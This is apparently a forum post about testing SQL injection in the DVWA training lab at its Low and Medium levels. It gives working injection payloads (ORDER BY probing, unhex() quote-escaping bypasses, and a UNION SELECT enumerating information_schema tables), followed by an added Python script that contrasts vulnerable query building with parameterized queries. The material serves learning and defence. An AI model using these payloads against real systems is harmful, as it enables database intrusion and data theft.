As usual, a tick or quote `'` is used to test for SQLi vulnerabilities in DVWA.

DVWA Low Level Security:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
```

DVWA Medium Level Security:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
```

Both are vulnerable to SQLi, but the error messages from these two levels are different:

- Low: `'''''`
- Medium: `'\''`
So, I tried it with `' ORDER BY 10 -- -` and the SQL query works for Low level:

```
Unknown column '10' in 'order clause'
```

But the same SQL query did not work on Medium level ... the query was broken, hence producing the following error:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY 10 -- -' at line 1
```

I notice that every time `'` is used on Medium level, it will be escaped with `\`.
Then, I decided to use a different trick to bypass this, which is `%27`. `27` is the hex value of a single quote `'`. I decided to change `'` in `' ORDER BY 10 -- -`: `'` is replaced with `%27`, so it becomes `%27 ORDER BY 10 -- -`.

Unfortunately, this trick won't work on Low Level (no error at all), and here is the error on Medium level:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY 10 -- -' at line 1
```

Since this is a GET request, the request can be seen in the address bar:

```
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=%2527+ORDER+BY+10+--+-&Submit=Submit#
```

Interesting, `%27` has been encoded by the browser again, so it becomes `%2527`. `25` is the hex value for `%`. So this won't work.
I've no idea at the moment, so I googled more and found a trick to use the `unhex()` function:

```
unhex(27) ORDER BY 10 -- -
```

With this, I was able to use the `ORDER BY` function. But this only works on Medium, not Low level:

```
Unknown column '10' in 'order clause'
```

I thought the problem was solved. But when I try to use it with different SQL syntax such as `table_schema='dvwa'`, I'm getting the same error, which is expected.

```
unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema='dvwa'-- -
```

Error:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dvwa'-- -' at line 1
```

Since the `unhex()` trick worked before, I thought it would work on this too.

```
unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=unhex(27)dvwaunhex(27)-- -
```

Error:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'dvwaunhex(27)-- -' at line 1
```

Little did I know ... I need to separate the second `unhex(27)` function from the database name, which is `dvwa`. Else, SQL will read it as `dvwaunhex(27)-- -`.

I'm stuck here. How do I solve this problem?
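The behaviour described in the post (the quote payload working on Low but being escaped on Medium) comes down to where the `id` parameter lands in the SQL text and whether the escaping matches that context. The following Python script is an added example, not the poster's code and not DVWA's own source: it models the two query shapes, runs the post's own inputs through them, and contrasts them with a hardened builder that enforces the expected type and binds the value. Assumptions: the Low shape wraps the id in single quotes without escaping and the Medium shape backslash-escapes quotes but leaves the id unquoted (both inferred from the error messages above); `escape_like_mysql` is a minimal imitation of backslash escaping; SQLite stands in for MySQL (its error wording differs, so results are classified by category); and the `users` table is constructed test data.

```python
import sqlite3

# Inputs quoted from the post (constructed test input; the only payloads used here).
TICK = "'"
ORDER_BY_PAYLOAD = "' ORDER BY 10 -- -"
UNHEX_PAYLOAD = "unhex(27) ORDER BY 10 -- -"


def escape_like_mysql(value: str) -> str:
    # Assumed minimal imitation of backslash escaping: turns ' into \' (the \' seen
    # in the Medium error) and doubles any existing backslash.
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_low(user_id: str) -> str:
    # Assumed Low shape: the parameter sits inside single quotes, unescaped.
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"


def build_medium(user_id: str) -> str:
    # Assumed Medium shape: quotes are escaped, but the parameter is unquoted,
    # so the escaping defends a string context that is not the one in use.
    return f"SELECT first_name, last_name FROM users WHERE user_id = {escape_like_mysql(user_id)}"


def build_hardened(user_id: str):
    # Hardened form: enforce the expected type first, then pass the value as a
    # bound parameter so it never becomes part of the SQL text at all.
    try:
        uid = int(user_id.strip())
    except ValueError:
        return None  # anything that is not an integer id is rejected before SQL
    return "SELECT first_name, last_name FROM users WHERE user_id = ?", (uid,)


def fresh_db() -> sqlite3.Connection:
    # Constructed stand-in for the DVWA users table (two columns selected, like the page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown")])
    return conn


def outcome(sql: str, params=()) -> str:
    # Classify what the database does with the finished statement:
    #   'rows'     - the statement ran as intended
    #   'altered'  - it parsed, but the injected clause was interpreted
    #                (here: ORDER BY 10 on a two-column select is out of range)
    #   'rejected' - the tokenizer/parser refused it, the counterpart of
    #                MySQL's "error in your SQL syntax"
    conn = fresh_db()
    try:
        conn.execute(sql, params).fetchall()
        return "rows"
    except sqlite3.OperationalError as exc:
        msg = str(exc).lower()
        if "syntax error" in msg or "unrecognized token" in msg:
            return "rejected"
        return "altered"
    finally:
        conn.close()


def compare() -> dict:
    # One row per (builder, input) so the contrast is visible at a glance.
    results = {}
    for label, inp in (("tick", TICK), ("order_by", ORDER_BY_PAYLOAD)):
        results[("low", label)] = outcome(build_low(inp))
        results[("medium", label)] = outcome(build_medium(inp))
    for label, inp in (("order_by", ORDER_BY_PAYLOAD), ("unhex", UNHEX_PAYLOAD)):
        results[("hardened", label)] = "rejected" if build_hardened(inp) is None else "built"
    sql, params = build_hardened("1")
    results[("hardened", "legit_id")] = outcome(sql, params)
    return results


if __name__ == "__main__":
    for (builder, label), result in compare().items():
        print(f"{builder:9s} {label:9s} -> {result}")
```

Run it with `python3 escape_context.py`. The Low builder lets `' ORDER BY 10 -- -` close the string literal, so the injected clause is interpreted (`altered`); the Medium builder's backslash makes the same input a parse error (`rejected`), which is exactly what the post observes, but that is an accident of context rather than a defence, since the parameter is still concatenated into the statement. The hardened builder never gets that far: both payloads fail the integer check, and a legitimate id travels as a bound parameter.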